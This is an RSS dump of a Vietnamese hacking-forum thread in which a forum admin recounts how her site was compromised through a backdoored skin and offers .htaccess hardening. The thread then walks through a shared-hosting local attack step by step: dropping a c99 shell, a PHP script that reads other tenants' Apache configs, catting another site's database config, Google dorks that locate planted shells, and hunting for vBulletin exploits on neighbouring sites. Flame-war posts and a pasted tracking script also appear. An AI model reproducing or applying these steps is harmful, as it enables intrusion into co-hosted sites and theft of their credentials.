<![CDATA[Latest posts for the topic "Tản mạn Local Attack :D"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Tản mạn Local Attack :D [color="#FF0000"]Phấn 1 :[/color] Mấy ngày qua VN Magic đã bị tấn công liên tục do sự bất cẩn của Quỷnh Anh trong công việc bảo mật . Qua sự việc này Quỳnh Anh tổng kết lại 1 vài điểm căn bản về các hướng đi của attackers trong quá trình local attack . Bài viết sẽ chia làm nhiều phần khác nhau dựa trên các server cấu hình khác nhau và công dụng của r57 , c99 . Trước tiên để mở đầu Quỳnh Anh sẽ tóm tắt lại quá trình VN Magic bị hack như thế nào . Đây thật sự là 1 sai lầm rất lớn của Quỷnh Anh nhưng cũng có thể là bài học kinh nghiệm dành cho các webmasters khác . Diễn đàn VN Magic phát triển trên mã nguồn IPB , và dĩ nhiên là ko hợp pháp vì sử dụng bản nulled , điều này sẽ hạn chế 1 số chức năng hữu ích so với bản có bản quyền , vấn đề này chúng ta sẽ thảo luận ở 1 đề tài khác . Sai lầm của Quỳnh Anh bắt nguồn từ việc import skin của diễn đàn , Quỳnh Anh đã download các skin shared ko rõ nguồn gốc từ các site về IPB của Việt Nam . Trước đây Quỷnh Anh qua trang Google đã có biết đến việc đính kèm shell vào skin forum như sources shared do 1 nhóm " hắc cờ " Việt Nam thực hiện . Các bạn hãy mở trang Google lên và search với từ khóa sau : Code:
intitle:R57shell - Developed by Navaro - Vn Force Group

Kết quả sẽ cho ta rất nhiều sites đã bị đính kèm shell của nhóm Vn Force Group nào đó , lướt sơ qua các links tìm được từ Google sẽ cho ta biết các sites nạn nhân đa số đều sử dụng sources , skin cho forum đã bị đính kèm php shell , Quỳnh Anh xin để các bạn cảm nhận riêng của mỗi người về [color="#FF0000"]thủ đoạn[/color] này . Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân :) . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra . Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người :D . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này . Nhưng Quỳnh Anh thiết nghĩ điều này cũng ko thể ngăn cản chúng ta sử dụng free stuffs từ Internet :P . Chỉ cần các bạn chú ý hơn trong công việc bảo mật site của mình . Ví dụ như với các skin shared dành cho IPB nếu có đính kèm shell hay mã độc thì chúng ta sau khi import vào board của mình , hãy tạo 1 files [color="#FF0000"].htaccess[/color] có nội dung sau và đâ vào các folders chức files skin :
<Files ~ "^.*\.([color="#FF0000"]php|cgi|pl|php3|php4|php5|php6|phtml|shtml[/color])"> Order allow,deny Deny from all </Files> 
Với hàng màu đỏ là tùy biến các đuôi files ko cho phép sử dụng trực tiếp , các bạn có thể thêm vào hoặc bớt đi các tùy biến khác . Và đối với các trang sử dụng IPB chúng ta tốt nhất là nên đặt file [color="#FF0000"].htaccess[/color] nói trên vào tất cả các folders con của board ( trừ directory chính ra :P ) , tác dụng có lẽ các bạn cũng đã hiểu Quỳnh Anh sẽ ko nói thêm nữa . Quỳnh Anh viết bài này với mong muốn nhận được sự giúp đỡ ý kiến của tất cả mọi người trên tinh thần chia sẽ , rất mong được các anh chị đi trước cũng như bạn bè gần xa hướng dẫn thêm cho Quỳnh Anh vì Quỳnh Anh thật sự chỉ là newbie :) . Qua sự việc VN Magic bị hack , Quỳnh Anh xin thành thật nhận khuyết điểm và Ban Quản trị VN Magic sau khi xét qua " [color="#00FF00"]công và tội[/color] " của Quỳnh Anh trong thời gian qua đã quyết định hạ Quỳnh Anh xuống 1 cấp ( huhu :( ) , VN Magic Root Admin hiện tại sẽ do anh [color="#FF0000"]Qhoa[/color] đảm nhận . Phần 1 Quỳnh Anh xin tạm ngừng ở đây , phần sau chúng ta sẽ thực nghiệm lại quá trình VN Magic bị local attack và hướng local attack tren [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]ww.ixwebhosting.com[/color] ) .]]>
/hvaonline/posts/list/11448.html#65952 /hvaonline/posts/list/11448.html#65952 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#65955 /hvaonline/posts/list/11448.html#65955 GMT Tản mạn Local Attack :D [color="#FF0000"]Phần 2 :[/color] Ở phần này chúng ta sẽ cùng thảo luận về local attack căn bản nhất là tấn công vào database 1 site ( kỹ thuật nâng cao như Get root và Mass Deface Quỳnh Anh sẽ trình bày ở các phần tiếp theo ) . Trở lại việc VN MAGIC bị hack như thế nào mời các bạn xem qua hình dưới đây :
Như Quỳnh Anh đã nói qua ở phần 1 , chúng ta sẽ dễ dàng nhận thấy nhân vật dinhcaohack này hóa ra " [color="#FF0000"]upload shell , tìm path và exploit[/color] " lại bằng kiểu như thế :| ... Điều này chúng ta tạm gác qua một bên vì Quỳnh Anh hiện tại ko muốn nói cảm nhận của mình về 1 con người như vậy . VN Magic lỗi từ trong source nên việc bị drop database ko cần phải nói thêm nữa . VN Magic thời gian vừa qua đặt trên [color="#FF0000"]IX WEB HOSTING[/color] ( [color="#2E8B57"]www.ixwebhosting.com[/color] ) , do khi mua host , phía nhà cung cấp đã gọi điện thoại để confirm nên Quỳnh Anh quá chủ quan ko chú trọng vào việc bảo mật trang board của VN Magic vì Quỳnh Anh ko nghĩ 1 nhóm nào đó muốn tấn công kiểu local attack vào VN Magic lại có thể dùng CC chùa để mua host được , hoặc ít nhất cũng ko làm vậy ... Trở lại VN Magic sau khi bị drop , nhân vật dinhcaohack này muốn che dấu các bước đi của mình ( để khai thác lâu dài hay một mục đích gì khác mà Quỳnh Anh chưa biết ) nên đã tạo upload [color="#FF0000"]c99[/color] vào folder [color="#2E8B57"]testsh [/color] của site [color="#2E8B57"]www.viethacker.name[/color] , site này nằm chung account với VN Magic trên IX WEB HOSTING nên không khó để làm việc này vì folder nói trên được [color="#FF0000"]CHMOD 777[/color] ( ở phần 3 của bài viết chúng ta sẽ đi chi tiết vào vấn đề này ) . Phần dưới đây Quỳnh Anh sẽ trình bày về kiểu local attack căn bản nhất qua sử dụng c99 là tấn công vào database của site . Quỳnh Anh đã nói ở trên là viethacker.name và vnmagic.net cùng 1 account nên không khó gì để khai thác , nhưng bài viết ở dưới đây sẽ ví dụ như viethacker.name và vnmagic.net nằm trên cùng server mà ko có cùng account ( điều này quan trọng vì mỗi các site đặt trên server đều có path riêng dựa theo 1 quy tắc nhất định ) . Chúng ta sẽ tiến hành local attack VN Magic từ c99 mà dinhcaohack đã đặt trên viethacker.name :
Host server của IX WEB HOSTING thoáng qua thì có thể lầm tưởng là khá an toàn khi set quyền trên server , ví dụ như ko thể dùng lệnh cd trực tiếp từ site này qua site khác , ko thể view các thư mục quan trọng , nhưng lại có những kẽ hở khác ví dụ như từ site này có thể dùng lệnh ls để view cấu trúc site khác . Các bạn hãy xem tiếp hình dưới đây sau khi chuyển qua Work Directory là [color="#FF0000"]/hsphere/local/[/color] :
Attacker có thể dễ dàng view thư mục [color="#FF0000"]config[/color] của server , và cũng như vậy đối với phần apache config của các sites đặt trên server .
Các files [color="#FF0000"]*.conf[/color] nếu các bạn có am hiểu về Apache sẽ ko xa lạ gì nữa . Để có thể xem được cấu hình của từng site trên server này , chúng ta sẽ copy lại toàn bộ tên của các files .conf nói trên và tạo 1 php script có nội dung như sau :
<?php $a="<html><body>"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/[color="#FF0000"]15470533[/color].conf")."<br />"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15469239.conf")."<br />"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15468170.conf")."<br />"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15462385.conf")."<br />"; ..............................................................................................................; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15344463.conf")."<br />"; $a.=file_get_contents("/hsphere/local/config/httpd/sites/15331662.conf")."<br />"; $a.="</body></html>"; echo $a; ?> 
với các số [color="#FF0000"]15470533[/color] chính là tên của config mỗi site , save file này thành hack.php và upload lên folder testsh của viethacker.name ( folder này chmod 777 ) , dùng URL Browser chạy file này ta sẽ có kết quả :
View Page Source và tìm đến tên trang muốn khai thác như bài viết này trình bày về hack vnmagic.net :
Bạn sẽ thấy toàn bộ phần Virtual Host của site , có được path chính của trang vnmagic.net là [color="#FF0000"]/hsphere/local/home/mna291/vnmagic.net[/color] , trở lại c99 dùng lệnh ls -lia :
Ta sẽ thấy được toàn bộ cấu trúc của VN MAGIC , và không khó khăn gì để tiếp tục view vào folder board của vnmagic.net đồng thời dùng lệnh cat để đọc nội dung file config của forum : cat /hsphere/local/home/mna291/vnmagic.net/board/conf_global.php >>> chúng ta sẽ có kết quả :
Tới đây chắc hẳn mọi người sẽ biết các bước tiếp theo như thế nào rồi . Qua chuyện này Quỳnh Anh thật ko dám đánh giá trình độ của các tay tấn công VN Magic mấy ngày vừa qua , bởi có database rồi mà ko biết làm sao để deface khi vướng cái pass protect của ACP ( gợi ý dùng John The Ripper :P ) , đành phải giở trò drop database của VN Magic :lol: . Đã thế trong lúc chuyển server chưa phát hiện lỗi từ source và chưa on .htaccess nên khiến cho nhân vật vn3security nào đó của hội HCE " đục nước béo cò " nhảy vào phá database của VN Magic thêm lần nữa :) . Nên khinh hay nên buồn cho khả năng của những người như thế nhỉ :( . Giải pháp đặt ra tạm thời nếu bạn sử dụng host của server này để chạy 1 forum như VN Magic thì chmod các folders con là 701 , directory chính của site ví dụ như /hsphere/local/home/mna291/vnmagic.net/ chmod 101 sau khi hoàn thành setup board , đồng thời đổi vị trí file config forum và Zend lại toàn bộ source cùng đặt file .htaccess như đã nói ở phần 1 , điều này sẽ hạn chế được rất nhiều sự khai thác của attackers . Tuy ko phải là ko thể khai thác được ( Quỳnh Anh sẽ nói ở 1 chủ đề khác về việc decode Zend ) nhưng ít ra cũng làm mấy anh chàng " gà " cụt hứng . Phần 2 Quỳnh Anh sẽ ngưng ở đây , phần sau Quỳnh Anh sẽ trình bày 1 số kỹ thuật đơn giản qua các php shell c99 và r57 , netcat bổ sung thêm cho đề tài Local Attack trước khi vào phần nâng cao .]]>
/hvaonline/posts/list/11448.html#65974 /hvaonline/posts/list/11448.html#65974 GMT
Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#65985 /hvaonline/posts/list/11448.html#65985 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66000 /hvaonline/posts/list/11448.html#66000 GMT Re: Tản mạn Local Attack :D

conmale wrote:
Hừm.... lại r57, c99. Không biết chừng nào mới lớn khôn. 
:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method ]]>
/hvaonline/posts/list/11448.html#66009 /hvaonline/posts/list/11448.html#66009 GMT
Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66010 /hvaonline/posts/list/11448.html#66010 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66035 /hvaonline/posts/list/11448.html#66035 GMT Re: Tản mạn Local Attack :D C99:
intitle:c99shell filetype:php 
R57
intitle:r57shell filetype:php 
Php remote wiev
intitle:"phpremoteview" filetype:php 
:(( .]]>
/hvaonline/posts/list/11448.html#66045 /hvaonline/posts/list/11448.html#66045 GMT
Re: Tản mạn Local Attack :D

EnterX wrote:
:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method  
GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ? Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ? ]]>
/hvaonline/posts/list/11448.html#66051 /hvaonline/posts/list/11448.html#66051 GMT
Re: Tản mạn Local Attack :D

GirL Noob wrote:

EnterX wrote:
:mrgreen: Cái trò hack local chả có tí chất xám nào cả ==> stupid method  
GirL no0B xin lỗi vì ko thể chấp nhận nổi ý kiến của bạn , bạn trích lại lời của anh conmale rồi thêm vào câu sau mà ko có suy nghĩ , anh conmale nói như vậy vì ảnh có cái lý riêng của ảnh về r57 và c99 , còn với bạn bạn nghĩ sao mà nói local attack là stupid method ? Local attack có bao nhiêu kiểu khai thác bạn đã nắm hết chưa ? ko lẽ bạn nghĩ phải sử dụng các loại php shell như trên mới local attack được sao ? Đối với các sever cấu hình lỏng lẻo hoặc có lỗi , kết quả của local attack là get root server và điều này vô cùng nguy hiểm , liệu bạn đã đủ " chất xám " để hiểu các hướng khai thác hay chưa mà bình luận " vớ vẩn " như thế nhỉ ?  
Mình nói thế chẳng qua dạo này thấy có quá nhiều người dùng kiểu hack này một cách máy móc, đại loại như hack vbb thông qua hack ipb... Bản thân mình trước đây cũng khác nhiều lần hack local nên mới nói vậy. Còn mình ko coi thường get root, mình quan niệm get root ở 1 "đẳng cấp khác", là hack server rồi chứ ko còn coi đó là hack web bằng phương pháp local nữa. Do đó theo quan niệm của mình thì local vẫn là 1 "stupid method"]]>
/hvaonline/posts/list/11448.html#66103 /hvaonline/posts/list/11448.html#66103 GMT
Tản mạn Local Attack :D Phần 3 :[/color] Tiêu đề của bài viết này là " [color="#00FF00"]Tản mạn ...[/color] " cho nên Quỳnh Anh nghĩ chúng ta ko nhất thiết phải tập trung vào một vấn đề nào đó mà sẽ thảo luận về tất cả những gì có liên quan xoay quanh chủ đề chính . Sau 2 phần đầu , lướt sơ qua Quỳnh Anh thấy đa số các bạn mới tìm hiểu về hacking còn rất mơ hồ về vấn đề Local Attack , vậy nên phần này chúng ta sẽ tạm gác các kỹ thuật khai thác cũng như công dụng ( cũng như tác hại :P ) của r57 , c99 qua 1 bên để bàn ra xa hơn 1 chút nhằm mục đích thư giãn trước khi đi tiếp các phần sau . Khi Quỳnh Anh đặt ra câu hỏi : [color="#FF0000"]Làm sao để Local Attack 1 site nào đó ( mục tiêu xác định ) ? [/color] thì hầu hết câu trả lời mà Quỷnh Anh nhận được đều đại loại như : " Dễ ẹc , dùng CC chùa mua host chung với site đó rồi up shell lên " , hoặc " Ôi trời có gì đâu , cứ kèm code ( để remote file attack ) hoặc gắn shell vào sources rùi share cho victim download ( như VN MAGIC bị vừa rồi ) " . Hix hix vậy nên đa số đều có vẻ ngập ngừng khi Quỳnh Anh hỏi tiếp : [color="#FF0000"]Nếu victim đặt trên private server ( ko phải share host ) và cũng ko download sources " kèm trẻ em " của mình thì thế nào ?[/color] Cá nhân Quỳnh Anh nghĩ rằng không có gì là tuyệt đối cả , ko bằng cách này thì cũng sẽ có cách khác ... Tiếp theo dưới đây Quỳnh Anh muốn nhắc lại một chút về công dụng của các trang Search , công cụ tìm kiếm trực tuyến mà nhiều bạn lơ là ko tận dụng . Giả sử như mục tiêu Quỳnh Anh đặt ra là trang hcvgroup.net ( Quỳnh Anh xin lỗi mấy chú HCE Group trước vì lấy site mấy chú làm ví dụ cho bài viết nhưng thiết nghĩ ví dụ thì chỉ là ví dụ , nó chẳng có tác hại gì :P ) , trang này nằm trên private server và có vẻ khá an toàn . Mở Command Prompt ping thử trang này xem sao :
Kết quả cho ta thấy IP của site này là 85.114.134.144 . Tiếp tục mở trang [color="#00FF00"]www.live.com[/color] lên và tìm kiếm như sau :
Kết quả sẽ cho chúng ta thấy các sites khác có cùng IP với hcegroup.net :
Nhìn vào kết quả tìm kiếm chúng ta sẽ thấy cái HCE prIvAtE vErsIOn gì đó ( domain hcegroup.biz ) [color="#FF0000"]powered by vBulletin[/color] . Tới đây chắc các bạn cũng hiểu được hướng Quỳnh Anh đang tiến hành rồi phải ko :) ? Không đi trực tiếp được thì chúng ta sẽ đi vòng hihi . Tiếp tục vào xem trang này xem có thu thập thêm được thông tin gì ko :
Powered by vBulletin® Version 3.6.4 Copyright ©2000 - 2007, Jelsoft Enterprises Ltd.  
Àh àh VBB ver 3.6.4 , hình như VBB có thể chèn thêm code vào temp ( để gọi php shell _ RFI >>> Local Attack hcegroup.net ) nếu chiếm được quyền admin . Mở Yahoo hoặc Google lên và search thử với các từ khóa :
Exploit vBulletin ver 3.6.4 
Kết quả cũng ko đến nổi tệ chứ :P . Vào trang [color="#00FF00"]www.milw0rm.com[/color] chúng ta sẽ có kết quả trực tiếp hơn :
Quỳnh Anh tạm thời ngừng phần 3 ở đây vì nếu đi tiếp e rằng sẽ lạc đề , chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa :P . Các phần sau của bài viết hi vọng sẽ thú vị hơn và giúp cho mọi người có một cái nhìn thực tế hơn về mức độ nguy hiểm của Local Attack . [color="#9ACD32"]Lưu ý bài viết trên đây chỉ có giá trị tham khảo , thực tế ko hẳn là như vậy đâu nhé các bạn .[/color] ]]>
/hvaonline/posts/list/11448.html#66104 /hvaonline/posts/list/11448.html#66104 GMT
Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66110 /hvaonline/posts/list/11448.html#66110 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66124 /hvaonline/posts/list/11448.html#66124 GMT Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66148 /hvaonline/posts/list/11448.html#66148 GMT Tản mạn Local Attack :D Từ đây rút ra 1 kinh nghiệm xương máu rằng trên đời hiếm có thứ gì được chia sẽ mà ko kèm mục đích , mục đích tốt hay xấu thì tùy cá nhân :) . Trên các mã nguồn bất hợp pháp được share tràn lan thì việc đính kèm 1 đoạn mã độc , kèm backdoor là việc hoàn toàn có khả năng xảy ra . Thật đáng tiếc là VN Magic lại trở thành nạn nhân khi sử dụng " nguồn tài nguyên vô tận " từ Internet ( theo cách gọi nôm na của mọi người :D . Skin đã bị đính kèm mã độc ngay từ đầu mà Quỳnh Anh ko phát hiện ra . Quỳnh Anh sẽ đơn cử 1 vài đoạn code đính kèm tưởng như vô hại nhưng mà là cả 1 vấn đề đối với những người hiểu biết về lập trình PHP ở các phần sau của bài viết này .   Cứ cho là lời nhân vật QA nào đó nhận định là đúng ( ở đây lại thấy 1 điều .. bất cập là có nick Girl Noob post bài của QA bên HVA, ở vnmagic.net cũng có đến .. 2 nicknames : QA v GirlNoob .... Noob hay Núp đấy cứ phải "mượn dao kẻ khác" thế em? ) * Nếu webmaster sử dụng .. nguồn tài nguyên vô tận .. vớ vẩn Thứ nhất 1 webmaster (về lĩnh vực thành lập 1 site hacking.. có tiếng ) không bao giờ sử dụng 1 shared script khi chưa hiểu mục đích của script đó như thế nào (điển hình ở đây là HVA, VHS và vnISS+) .. Thế vậy script này bị .. dính shell là do ... lấy được trên mạng =)) ... buồn cười .. (mình bắt đầu nhớ tới thuật ngữ scriptkiddies) và em QA phải hiểu *.1 : em đã bị hack từ trước và có kẻ đã kịp ... gắn shell vào DB em *.2 : hắn gắn được shell vào DB em .. chứng tỏ .. hắn có chứ đừng nói là thừa khả năng để deface site em ;) *.3 : lần thứ 2 server của em bị hack (dedicated windows server) chẳng phải là do .. bind shell ở cái nào cả =)) < sorry 3verybodie, keep secret! > ** Cái hình đoạn chat của nhân vật " DCH Em DH " với em có thể 1 trong 2 là faked ? Bởi vì ai trong HCV cũng rõ anh và des là 2 .. người rất thân :| ( Ở đây người ta nghĩ tới 1 cảnh tâm lý chiến chia rẽ 2 người =)) supernoob) In short, a thấy rất quái lạ là chỉ trong 1-2 tháng mới thành lập, vnmagic lần lượt thách thức matrix2k ( direct domain matrix2k.org đã bị lão Neo bán từ lâu ), HCE ( vnForce Group), HCV ( defaced ), vnISS+ ( kjngasawa shouted fuckin' sth ...) :D .. Nhưng không lạ lắm là vnmagic cũng đã bị các nhóm trên deface + drop DB tính lần lượt là 3 lần =)) P/S : anh chỉ khuyên em thế này, anh thấy có khá nhiều người PM anh hỏi chuyện này nhưng hầu hết là kiểu : xxx: ke. no xxx: nhung ma xxx: cai' dua' post cai bai nay len xxx: no' ko hieu la xxx: nhu dang khoe xxx: trinh do. cua? no' con non lam' hay sao i Vài lời nhố nhăng :p dinhcaohack :D vnISS+ HVA .]]> /hvaonline/posts/list/11448.html#66177 /hvaonline/posts/list/11448.html#66177 GMT Tản mạn Local Attack :D chỉ muốn nhắn với ai đó cho rằng Local Attack là " stupid method " thì nên suy nghĩ lại xem mình đã biết gì về Local Attack hay chưa :P  Phải chăng bạn coi thường tôi ??? Và dựa vào đâu ??? Xin nhắc lại điều mà ở trên tôi đã nói: tôi đã qua cái thời suốt ngày chỉ đi dùng các bug đã public + local att để hack. Chính bản thân đã từng bị chửi là "stupid method". Tôi ko phải là 1 kẻ kiêu ngạo nhưng cũng đủ tự tin để có câu trả lời "biết rất nhiều" đối với câu hỏi :
xem mình đã biết gì về Local Attack hay chưa  
Đừng nhìn người bằng nửa con mắt thế ??? Topic này bàn về kỹ thuật song lại vô cớ đụng chạm và bới móc tới nhiều người, nào là HCE , nào là DCH. Vậy ý đồ của bạn khi mở topic này là gì ??? Xin lỗi vì đã làm loãng chủ đề, bạn girl noob có thể tiếp tục. ]]>
/hvaonline/posts/list/11448.html#66182 /hvaonline/posts/list/11448.html#66182 GMT
Re: Tản mạn Local Attack :D 1 nhận thức riêng và 1 tầm hiểu biết riêng nên GirL no0B biết là mình sai rồi , hi vọng bạn sẽ ko chấp nhất nữa :P) . Về phần dinhcaohack có lẽ trình độ của you đã đạt tới " đỉnh cao " nên ko thèm xem kỹ phần 1 và 2 của bài viết đã quá rõ ràng . Việc upload 1 file vào 1 folder chmod 777 ko lẽ là vấn đề nan giải ? Thêm nữa nội dung của bài viết chỉ xoay quanh các hướng đi cơ bản của local attack nhằm chia sẽ với mọi người những kinh nghiệm thực tế chứ bản thân VN Magic bị lỗi từ trong source nên có chuyển đi đâu thì vẫn có thể bị phá như thường thôi , điều này bản thân dinhcaohack phải thừa hiểu hơn ai hết :mrgreen: , đừng nên chế ra thêm lỗi server này nọ để gây hoang mang lòng người như thế :lol:) , sau những sự việc xảy ra mấy ngày qua , GirL no0B thừa hiểu rằng làm gì có chuyện nhân nhượng từ đối phương dành cho VN Magic , nếu đã dùng thủ đoạn thì ngại gì mà ko dám nhận chứ ( ở đời trình độ ko đủ thì dùng thủ đoạn là lẽ bình thường mà ) ? nếu you cảm thấy GirL no0B nói ko đúng thì xin mời 1 lần nữa " in dấu " lên VN Magic cho GirL no0B tâm phục khẩu phục ( đây ko phải là lời thách thức mà chỉ đơn giản là muốn mở rộng tầm nhìn thôi , đừng hiểu lầm nhé ) . Tiếp tục , trên trang chủ của VN Magic đã giới thiệu rõ ràng GirL no0B cũng chính là Quỳnh Anh >>> admin mới của VN Magic , chỉ có ai ko có mắt mới ko thấy điều này cho nên chẳng có chuyện " mượn dao kẻ khác " này nọ như ý kiến của you . Nếu you làm điều gì khiến cho chính you cảm thấy nhột nhạt thì cũng ko cần phát biểu linh tinh làm gì để lộ ra cái " dại " của mình cho người ta thấy như thế . Việc sử dụng sources và scripts shared là sở thích của cá nhân thôi , GirL no0B ko muốn nói sâu hơn về chuyện này , nhưng đối với GirL no0B thì nhờ như thế mà GirL no0B học thêm được rất nhiều , và ít nhất cũng đã hiểu được trình độ của 1 số nhân vật from HCE , HCV và VNISS . Và cũng qua những điều như vậy mà GirL no0B càng thêm cảm phục các anh quản trị của HVA ( cái này thì GirL no0B sẽ nói sau ở 1 nơi thích hợp hơn ) nên quyết định vào đây để được học hỏi . Domain matrix2k.org hiện tại thuộc sở hữu của VN Magic cho nên việc sử dụng nó làm gì là quyền quản trị VN Magic , GirL no0B nghĩ ko đến nổi nghiêm trọng là sự " thách thức " như you nói chứ ? Còn lại các nhóm HCE hay HCV gì đó xin để mỗi người có ý kiến riêng của mỗi người , đơn cử việc bind shell vào soucres để phá hoại các site khác rồi lạm dụng chữ Hacking - Hacker che đậy cho cái hành động bỉ ổi >>> GirL no0B cảm thấy nực cười . Cuối cùng , GirL no0B xin nhắc lại rằng như đã nói rõ ràng ở phần đầu , bài viết này chỉ mang tính chất chia sẽ , đúc kết từ những kinh nghiệm cá nhân của GirL no0B đồng thời để được sự giúp đỡ từ các anh chị và các bạn đi trước hướng dẫn và chỉ điểm cho những điều sai sót , GirL no0B đã thừa nhận rõ ràng mình chỉ là newbie và luôn tha thiết được mọi người hướng dẫn thêm để bổ sung có cái kiến thức hạn hẹp của GirL no0B , hoàn toàn chẳng có ý khoe khoang như lời dinhcaohack bình luận , vâng trình độ của GirL no0B thì quả thật còn " non lắm " , nhưng cũng tự mừng là ko đến nỗi phải " kèm trẻ em " vào sources mới xóa được toàn bộ files và database của HCV :mrgreen: . Tóm lại đã tự hiểu những lời của mình là nhố nhăng thì ko cần thiết phải nói ra cho mọi người cùng thấy như thế đâu :-o) . Bắt đầu từ sau bài reply này GirL no0B xin mạn phép sẽ ko nói về những việc đi xa với chủ đề chính của Topic nữa . Cảm nhận về các ý kiến cá nhân xin để mọi người tự phán xét . Một lần nữa xin cảm ơn tất cả và hi vọng cùng được giao lưu học hỏi từ mọi người . Quỳnh Anh ( aka GirL no0B ) ]]> /hvaonline/posts/list/11448.html#66222 /hvaonline/posts/list/11448.html#66222 GMT Re: Tản mạn Local Attack :D /hvaonline/posts/list/11448.html#66290 /hvaonline/posts/list/11448.html#66290 GMT Tản mạn Local Attack :D

conmale wrote:
Hôm bữa rảnh một tí, tớ thử phân tích "con" r57 thì thấy có nhiều chi tiết lý thú. Tay Russian nào viết con này rất lém. Những kiddie nào dùng script đó để exploit thành công thì stats sẽ được log đến 1 server (khác). Chính người làm chủ stats server kia sẽ nắm trong tay chính xác bao nhiêu sites bị "con" r57 làm thịt và chính xác site nào luôn. E rằng các kiddie dùng mấy con script này không biết mấy cái chi tiết đó và đang đi làm... không công cho ai đó . Những server bị nhân nhượng có thể bị biến thành zombies --> hậu hoạn khó lường. Tip: soi các block base64 để biết chi tiết.  
Có 1 số "script kiddies" khác lại thay cái base64 đó ghi log vào host của mình nữa ==> "script kiddies" cũng lém lắm đó anh :mrgreen:]]>
/hvaonline/posts/list/11448.html#66291 /hvaonline/posts/list/11448.html#66291 GMT
Re: Tản mạn Local Attack :D <script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript>  :-o) ]]> /hvaonline/posts/list/11448.html#66384 /hvaonline/posts/list/11448.html#66384 GMT Re: Tản mạn Local Attack :D

GirL Noob wrote:
<script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript> 
:-o)  
Định làm cái gì vậy ??]]>
/hvaonline/posts/list/11448.html#66387 /hvaonline/posts/list/11448.html#66387 GMT
